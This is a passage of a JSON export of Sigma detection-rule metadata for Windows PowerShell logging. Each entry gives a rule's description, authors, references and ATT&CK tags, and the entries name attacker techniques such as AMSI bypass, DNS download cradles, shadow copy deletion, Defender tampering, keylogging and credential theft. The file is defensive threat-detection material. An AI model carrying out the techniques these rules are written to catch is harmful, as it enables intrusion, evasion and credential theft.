"6331d09b-4785-4c13-980f-f96661356249", "value": "PowerShell Downgrade Attack - PowerShell" }, { "description": "Detects remote PowerShell sessions", "meta": { "author": "Roberto Rodriguez @Cyb3rWard0g", "creation_date": "2019-08-10", "falsepositive": [ "Legitimate use of remote PowerShell sessions" ], "filename": "posh_pc_remote_powershell_session.yml", "level": "low", "logsource.category": "ps_classic_start", "logsource.product": "windows", "refs": [ "https://threathunterplaybook.com/hunts/windows/190511-RemotePwshExecution/notebook.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_remote_powershell_session.yml" ], "tags": [ "attack.execution", "attack.t1059.001", "attack.lateral-movement", "attack.t1021.006" ] }, "related": [ { "dest-uuid": 
"970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "60d0c01d-e2bf-49dd-a453-f8a9c9fa6f65", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "60167e5c-84b2-4c95-a7ac-86281f27c445", "value": "Remote PowerShell Session (PS Classic)" }, { "description": "Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.", "meta": { "author": "frack113", "creation_date": "2021-12-10", "falsepositive": [ "Unknown" ], "filename": "posh_pc_susp_get_nettcpconnection.yml", "level": "low", "logsource.category": "ps_classic_start", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-2---system-network-connections-discovery-with-powershell", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_susp_get_nettcpconnection.yml" ], "tags": [ "attack.discovery", "attack.t1049" ] }, "related": [ { "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b366adb4-d63d-422d-8a2c-186463b5ded0", "value": "Use Get-NetTCPConnection" }, { "description": "Detects a powershell download cradle using nslookup. 
This cradle uses nslookup to extract payloads from DNS records.", "meta": { "author": "Sai Prashanth Pulisetti @pulisettis, Aishwarya Singam", "creation_date": "2022-12-10", "falsepositive": [ "Unknown" ], "filename": "posh_pc_abuse_nslookup_with_dns_records.yml", "level": "medium", "logsource.category": "ps_classic_start", "logsource.product": "windows", "refs": [ "https://twitter.com/Alh4zr3d/status/1566489367232651264", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_abuse_nslookup_with_dns_records.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "999bff6d-dc15-44c9-9f5c-e1051bfc86e1", "value": "Nslookup PowerShell Download Cradle" }, { "description": "Detects a renamed Powershell execution, which is a common technique used to circumvent security controls and bypass detection logic that's dependent on process names and process paths.\n", "meta": { "author": "Harish Segar, frack113", "creation_date": "2020-06-29", "falsepositive": [ "Unknown" ], "filename": "posh_pc_renamed_powershell.yml", "level": "low", "logsource.category": "ps_classic_start", "logsource.product": "windows", "refs": [ "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_renamed_powershell.yml" ], "tags": [ "attack.execution", "attack.t1059.001", "attack.t1036.003" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "30a8cb77-8eb3-4cfb-8e79-ad457c5a4592", 
"value": "Renamed Powershell Under Powershell Channel" }, { "description": "Detects PowerShell scripts that make use of the \"Compress-Archive\" Cmdlet in order to compress folders and files where the output is stored in a potentially suspicious location that is used often by malware for exfiltration.\nAn adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), frack113", "creation_date": "2021-07-20", "falsepositive": [ "Unknown" ], "filename": "posh_pc_susp_zip_compress.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1074.001/T1074.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_susp_zip_compress.yml" ], "tags": [ "attack.collection", "attack.t1074.001" ] }, "related": [ { "dest-uuid": "1c34f7aa-9341-4a48-bfab-af22e51aca6c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "71ff406e-b633-4989-96ec-bc49d825a412", "value": "Zip A Folder With PowerShell For Staging In Temp - PowerShell" }, { "description": "Detects Shadow Copies deletion using operating system utilities via PowerShell", "meta": { "author": "frack113", "creation_date": "2021-06-03", "falsepositive": [ "Legitimate Administrator deletes Shadow Copies using operating system utilities for legitimate reason" ], "filename": "posh_pc_delete_volume_shadow_copies.yml", "level": "high", "logsource.category": "ps_classic_start", "logsource.product": "windows", "refs": [ 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md", "https://www.fortinet.com/blog/threat-research/stomping-shadow-copies-a-second-look-into-deletion-methods", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_delete_volume_shadow_copies.yml" ], "tags": [ "attack.impact", "attack.t1490" ] }, "related": [ { "dest-uuid": "f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "87df9ee1-5416-453a-8a08-e8d4a51e9ce1", "value": "Delete Volume Shadow Copies Via WMI With PowerShell" }, { "description": "Detects attempts to disable scheduled scanning and other parts of Windows Defender ATP, or to set default actions to allow.", "meta": { "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2021-06-07", "falsepositive": [ "Legitimate PowerShell scripts that disable Windows Defender for troubleshooting purposes. Must be investigated." ], "filename": "posh_pc_tamper_windows_defender_set_mp.yml", "level": "high", "logsource.category": "ps_classic_provider_start", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_tamper_windows_defender_set_mp.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ec19ebab-72dc-40e1-9728-4c0b805d722c", "value": "Tamper Windows Defender - PSClassic" }, { "description": "Detects PowerShell module creation where the module Contents are set to \"function Get-VMRemoteFXPhysicalVideoAdapter\". 
This could be a sign of potential abuse of the \"RemoteFXvGPUDisablement.exe\" binary which is known to be vulnerable to module load-order hijacking.", "meta": { "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2021-07-13", "falsepositive": [ "Unknown" ], "filename": "posh_pc_remotefxvgpudisablement_abuse.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", "https://github.com/redcanaryco/AtomicTestHarnesses/blob/7e1e4da116801e3d6fcc6bedb207064577e40572/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_remotefxvgpudisablement_abuse.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f65e22f9-819e-4f96-9c7b-498364ae7a25", "value": "Potential RemoteFXvGPUDisablement.EXE Abuse" }, { "description": "Adversaries may search for common password storage locations to obtain user credentials.\nPasswords are stored in several places on a system, depending on the operating system or application holding the credentials.\n", "meta": { "author": "frack113", "creation_date": "2021-12-20", "falsepositive": [ "Unknown" ], "filename": "posh_ps_enumerate_password_windows_credential_manager.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555/T1555.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_enumerate_password_windows_credential_manager.yml" 
], "tags": [ "attack.credential-access", "attack.t1555" ] }, "related": [ { "dest-uuid": "3fc9b85a-2862-4363-a64d-d692e3ffbee0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "603c6630-5225-49c1-8047-26c964553e0e", "value": "Enumerate Credentials from Windows Credential Manager With PowerShell" }, { "description": "Detects opening a handle on the drive volume via the \\\\.\\ DOS device path specifier and performing a direct access read of the first few bytes of the volume.", "meta": { "author": "frack113", "creation_date": "2022-01-09", "falsepositive": [ "Legitimate PowerShell scripts" ], "filename": "posh_ps_susp_iofilestream.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1006/T1006.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_iofilestream.yml" ], "tags": [ "attack.defense-evasion", "attack.t1070.003" ] }, "related": [ { "dest-uuid": "3aef9463-9a7a-43ba-8957-a867e07c1e6a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "70ad982f-67c8-40e0-a955-b920c2fa05cb", "value": "Suspicious IO.FileStream" }, { "description": "Detects PowerShell scripts that create sockets/listeners, which could be indicative of tunneling activity", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-07-08", "falsepositive": [ "Unknown" ], "filename": "posh_ps_susp_proxy_scripts.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/Arno0x/PowerShellScripts/blob/a6b7d5490fbf0b20f91195838f3a11156724b4f7/proxyTunnel.ps1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_proxy_scripts.yml" ], "tags": [ 
"attack.command-and-control", "attack.t1090" ] }, "related": [ { "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "bd33d2aa-497e-4651-9893-5c5364646595", "value": "Suspicious TCP Tunnel Via PowerShell Script" }, { "description": "Detects code fragments found in small and obfuscated AMSI bypass PowerShell scripts", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-11-09", "falsepositive": [ "Unknown" ], "filename": "posh_ps_amsi_bypass_pattern_nov22.yml", "level": "high", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/", "https://twitter.com/cyb3rops/status/1588574518057979905?s=20&t=A7hh93ONM7ni1Rj1jO5OaA", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_amsi_bypass_pattern_nov22.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001", "attack.execution" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e0d6c087-2d1c-47fd-8799-3904103c5a98", "value": "AMSI Bypass Pattern Assembly GetType" }, { "description": "Detects calls to the \"Add-Content\" cmdlet in order to modify the content of the user PowerShell profile, potentially adding suspicious commands for persistence", "meta": { "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2021-08-18", "falsepositive": [ "Legitimate administration and tuning scripts that aim to add functionality to a user PowerShell session" ], "filename": "posh_ps_user_profile_tampering.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.013/T1546.013.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_user_profile_tampering.yml" ], "tags": [ "attack.persistence", "attack.privilege-escalation", "attack.t1546.013" ] }, "related": [ { "dest-uuid": "0f2c410d-d740-4ed9-abb1-b8f4a7faf6c3", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "05b3e303-faf0-4f4a-9b30-46cc13e69152", "value": "Potential Persistence Via PowerShell User Profile Using Add-Content" }, { "description": "Adversaries may abuse PowerShell commands and scripts for execution.\nPowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system\n", "meta": { "author": "frack113", "creation_date": "2022-01-06", "falsepositive": [ "Legitimate administrative script" ], "filename": "posh_ps_remote_session_creation.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-10---powershell-invoke-downloadcradle", "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/new-pssession?view=powershell-7.4", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_remote_session_creation.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a0edd39f-a0c6-4c17-8141-261f958e8d8f", "value": "PowerShell Remote Session Creation" }, { "description": "Detects keywords that could indicate clearing PowerShell history", "meta": { "author": "Ilyas Ochkov, 
Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", "creation_date": "2022-01-25", "falsepositive": [ "Legitimate PowerShell scripts" ], "filename": "posh_ps_clear_powershell_history.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://gist.github.com/hook-s3c/7363a856c3cdbadeb71085147f042c1a", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_clear_powershell_history.yml" ], "tags": [ "attack.defense-evasion", "attack.t1070.003" ] }, "related": [ { "dest-uuid": "3aef9463-9a7a-43ba-8957-a867e07c1e6a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "26b692dc-1722-49b2-b496-a8258aa6371d", "value": "Clear PowerShell History - PowerShell" }, { "description": "Adversaries may abuse the Windows command shell for execution.\nThe Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems.\nThe Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands.\nBatch files (ex: .bat or .cmd) also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops.\nCommon uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple systems.\n", "meta": { "author": "frack113", "creation_date": "2022-01-02", "falsepositive": [ "Legitimate administration script" ], "filename": "posh_ps_susp_execute_batch_script.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.003/T1059.003.md#atomic-test-1---create-and-execute-batch-script", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_execute_batch_script.yml" ], "tags": [ "attack.execution", "attack.t1059.003" ] }, "related": [ { "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b5522a23-82da-44e5-9c8b-e10ed8955f88", "value": "Powershell Execute Batch Script" }, { "description": "Detects changing the PowerShell script execution policy to a potentially insecure level using the \"Set-ExecutionPolicy\" cmdlet.", "meta": { "author": "frack113", "creation_date": "2021-10-20", "falsepositive": [ "Administrator script" ], "filename": "posh_ps_set_policies_to_unsecure_level.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_execution_policies?view=powershell-7.4", "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.4", "https://adsecurity.org/?p=2604", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_set_policies_to_unsecure_level.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "61d0475c-173f-4844-86f7-f3eebae1c66b", "value": "Change PowerShell Policies to an Insecure Level - PowerShell" }, { "description": "Detects when a user disables the Windows Firewall via a Profile to help evade defense.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-10-12", "falsepositive": [ "Unknown" ], "filename": "posh_ps_windows_firewall_profile_disabled.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": 
"windows", "refs": [ "https://web.archive.org/web/20230929023836/http://powershellhelp.space/commands/set-netfirewallrule-psv5.php", "http://woshub.com/manage-windows-firewall-powershell/", "https://www.elastic.co/guide/en/security/current/windows-firewall-disabled-via-powershell.html", "https://learn.microsoft.com/en-us/powershell/module/netsecurity/set-netfirewallprofile?view=windowsserver2022-ps", "https://www.tutorialspoint.com/how-to-get-windows-firewall-profile-settings-using-powershell", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_windows_firewall_profile_disabled.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.004" ] }, "related": [ { "dest-uuid": "5372c5fe-f424-4def-bcd5-d3a8e770f07b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "488b44e7-3781-4a71-888d-c95abfacf44d", "value": "Windows Firewall Profile Disabled" }, { "description": "Detects malicious GPO modifications, which can be used to implement many other malicious behaviors.", "meta": { "author": "frack113", "creation_date": "2022-08-19", "falsepositive": [ "Legitimate use" ], "filename": "posh_ps_modify_group_policy_settings.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1484.001/T1484.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_modify_group_policy_settings.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1484.001" ] }, "related": [ { "dest-uuid": "5d2be8b9-d24c-4e98-83bf-2f5f79477163", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b7216a7d-687e-4c8d-82b1-3080b2ad961f", "value": "Modify Group Policy Settings - ScriptBlockLogging" }, { "description": "Adversaries 
may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol.", "meta": { "author": "frack113", "creation_date": "2022-01-23", "falsepositive": [ "Legitimate administrative script" ], "filename": "posh_ps_susp_ssl_keyword.yml", "level": "low", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1573/T1573.md#atomic-test-1---openssl-c2", "https://medium.com/walmartglobaltech/openssl-server-reverse-shell-from-windows-client-aee2dbfa0926", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_ssl_keyword.yml" ], "tags": [ "attack.command-and-control", "attack.t1573" ] }, "related": [ { "dest-uuid": "b8902400-e6c5-4ba2-95aa-2d35b442b118", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "195626f3-5f1b-4403-93b7-e6cfd4d6a078", "value": "Suspicious SSL Connection" }, { "description": "Detects adversaries enumerating sensitive files", "meta": { "author": "frack113", "creation_date": "2022-09-16", "falsepositive": [ "Unknown" ], "filename": "posh_ps_sensitive_file_discovery.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://twitter.com/malmoeb/status/1570814999370801158", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_sensitive_file_discovery.yml" ], "tags": [ "attack.discovery", "attack.t1083" ] }, "related": [ { "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7d416556-6502-45b2-9bad-9d2f05f38997", "value": "Powershell Sensitive File Discovery" }, { "description": "Detects AS-REP roasting. AS-REP roasting is an attack that is 
often-overlooked. It is not very common as you have to explicitly set accounts that do not require pre-authentication.", "meta": { "author": "frack113", "creation_date": "2022-03-17", "falsepositive": [ "Legitimate PowerShell scripts" ], "filename": "posh_ps_as_rep_roasting.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://shellgeek.com/useraccountcontrol-flags-to-manipulate-properties/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md#atomic-test-11---get-aduser-enumeration-using-useraccountcontrol-flags-as-rep-roasting", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_as_rep_roasting.yml" ], "tags": [ "attack.discovery", "attack.t1033" ] }, "related": [ { "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "96c982fe-3d08-4df4-bed2-eb14e02f21c8", "value": "Get-ADUser Enumeration Using UserAccountControl Flags" }, { "description": "Detects usage of the \"Import-Module\" cmdlet to load the \"Microsoft.ActiveDirectory.Management.dll\" DLL. 
Which is often used by attackers to perform AD enumeration.", "meta": { "author": "frack113, Nasreddine Bencherchali", "creation_date": "2023-01-22", "falsepositive": [ "Legitimate use of the library for administrative activity" ], "filename": "posh_ps_active_directory_module_dll_import.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/samratashok/ADModule", "https://twitter.com/cyb3rops/status/1617108657166061568?s=20", "https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-enumeration-with-ad-module-without-rsat-or-admin-privileges", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_active_directory_module_dll_import.yml" ], "tags": [ "attack.reconnaissance", "attack.discovery", "attack.impact" ] }, "uuid": "9e620995-f2d8-4630-8430-4afd89f77604", "value": "Potential Active Directory Enumeration Using AD Module - PsScript" }, { "description": "Detects Obfuscated use of stdin to execute PowerShell", "meta": { "author": "Jonathan Cheong, oscd.community", "creation_date": "2020-10-15", "falsepositive": [ "Unknown" ], "filename": "posh_ps_invoke_obfuscation_stdin.yml", "level": "high", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/SigmaHQ/sigma/issues/1009", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_stdin.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "779c8c12-0eb1-11eb-adc1-0242ac120002", 
"value": "Invoke-Obfuscation STDIN+ Launcher - Powershell" }, { "description": "Detects calls to \"get-process\" where the output is piped to a \"where-object\" filter to search for security solution processes.\nAdversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus\n", "meta": { "author": "frack113, Anish Bogati, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2021-12-16", "falsepositive": [ "False positives might occur due to the nature of the ScriptBlock being ingested as a big blob. Initial tuning is required.", "As the \"selection_cmdlet\" is common in scripts the matching engine might slow down the search. Change into regex or a more accurate string to avoid heavy resource consumption if experienced" ], "filename": "posh_ps_get_process_security_software_discovery.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518.001/T1518.001.md#atomic-test-2---security-software-discovery---powershell", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_get_process_security_software_discovery.yml" ], "tags": [ "attack.discovery", "attack.t1518.001" ] }, "related": [ { "dest-uuid": "cba37adb-d6fb-4610-b069-dd04c0643384", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "904e8e61-8edf-4350-b59c-b905fc8e810c", "value": "Security Software Discovery Via Powershell Script" }, { "description": "Adversaries may log user keystrokes to intercept credentials as the user types them.", "meta": { "author": "frack113", "creation_date": "2021-07-30", "falsepositive": [ "Unknown" ], "filename": "posh_ps_keylogging.yml", "level": "medium", 
"logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.001/src/Get-Keystrokes.ps1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_keylogging.yml" ], "tags": [ "attack.collection", "attack.t1056.001" ] }, "related": [ { "dest-uuid": "09a60ea3-a8d1-4ae5-976e-5783248b72a4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "34f90d3c-c297-49e9-b26d-911b05a4866c", "value": "Powershell Keylogging" }, { "description": "Uses PowerShell to install/copy a file into a system directory such as \"System32\" or \"SysWOW64\"", "meta": { "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2021-12-27", "falsepositive": [ "Unknown" ], "filename": "posh_ps_copy_item_system_directory.yml", "level": "high", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1556.002/T1556.002.md#atomic-test-1---install-and-register-password-filter-dll", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_copy_item_system_directory.yml" ], "tags": [ "attack.credential-access", "attack.t1556.002" ] }, "related": [ { "dest-uuid": "3731fbcd-0e43-47ae-ae6c-d15e510f0d42", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "63bf8794-9917-45bc-88dd-e1b5abc0ecfd", "value": "Powershell Install a DLL in System Directory" }, { "description": "Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts.\nWithout 
knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism\n", "meta": { "author": "frack113", "creation_date": "2021-12-27", "falsepositive": [ "Unknown" ], "filename": "posh_ps_susp_networkcredential.yml", "level": "low", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1110.001/T1110.001.md#atomic-test-2---brute-force-credentials-of-single-active-directory-domain-user-via-ldap-against-domain-controller-ntlm-or-kerberos", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_networkcredential.yml" ], "tags": [ "attack.credential-access", "attack.t1110.001" ] }, "related": [ { "dest-uuid": "09c4c11e-4fa1-4f8c-8dad-3cf8e69ad119", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1883444f-084b-419b-ac62-e0d0c5b3693f", "value": "Suspicious Connection to Remote Account" }, { "description": "Detects calls to cmdlets inside of PowerShell scripts that are used to export certificates from the local certificate store. Threat actors were seen abusing this to steal private keys from compromised machines.", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-04-23", "falsepositive": [ "Legitimate certificate exports by administrators. Additional filters might be required." 
